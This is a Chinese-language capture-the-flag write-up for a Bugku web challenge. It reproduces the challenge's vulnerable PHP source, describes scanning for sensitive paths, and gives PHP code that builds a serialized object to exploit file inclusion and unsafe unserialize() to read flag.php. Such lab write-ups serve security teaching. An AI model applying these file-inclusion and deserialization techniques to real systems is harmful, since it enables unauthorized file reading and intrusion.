http://123.206.87.240:8006/test1/ 拿到题之后先看源码
you are not the number of bugku ! <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){ echo "hello admin!<br>"; include($file); //hint.php }else{ echo "you are not admin ! "; } -->根据源码内容,修改post包 得到一段base64编码,解码之后 尝试修改post,得到 base64解码之后,得到一段代码
<?php $txt = $_GET["txt"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){ echo "hello friend!<br>"; if(preg_match("/flag/",$file)){ echo "不能现在就给你flag哦"; exit(); }else{ include($file); $password = unserialize($password); echo $password; } }else{ echo "you are not the number of bugku ! "; } ?> <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){ echo "hello admin!<br>"; include($file); //hint.php }else{ echo "you are not admin ! "; } -->下载SourceLeakHacker-master,SourceLeakHacker是一款敏感目录扫描工具。看到那个绿色的200表示能够成功访问,这就是扫出来的敏感路径 找到flag.php,重新修改之前的报文,得到
修改补全之前的Flag
<?php class Flag{//flag.php public $file; public function __tostring(){ if(isset($this->file)){ echo file_get_contents($this->file); echo "<br>"; return ("good"); } } } $o = new Flag(); $o->file="flag.php"; $o->__tostring(); echo serialize($o); ?>序列化:serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。 这有利于存储或传递 PHP 的值,同时不丢失其类型和结构。以下是序列化后对应值: String s:size:value;
Integer i:value;
Boolean b:value; (does not store “true” or “false”, does store ‘1’ or ‘0’)
运行后得到结果: 得到flag.php内序列化后的内容,然后重新修改报文,提交之后的flag 最后拿到flag
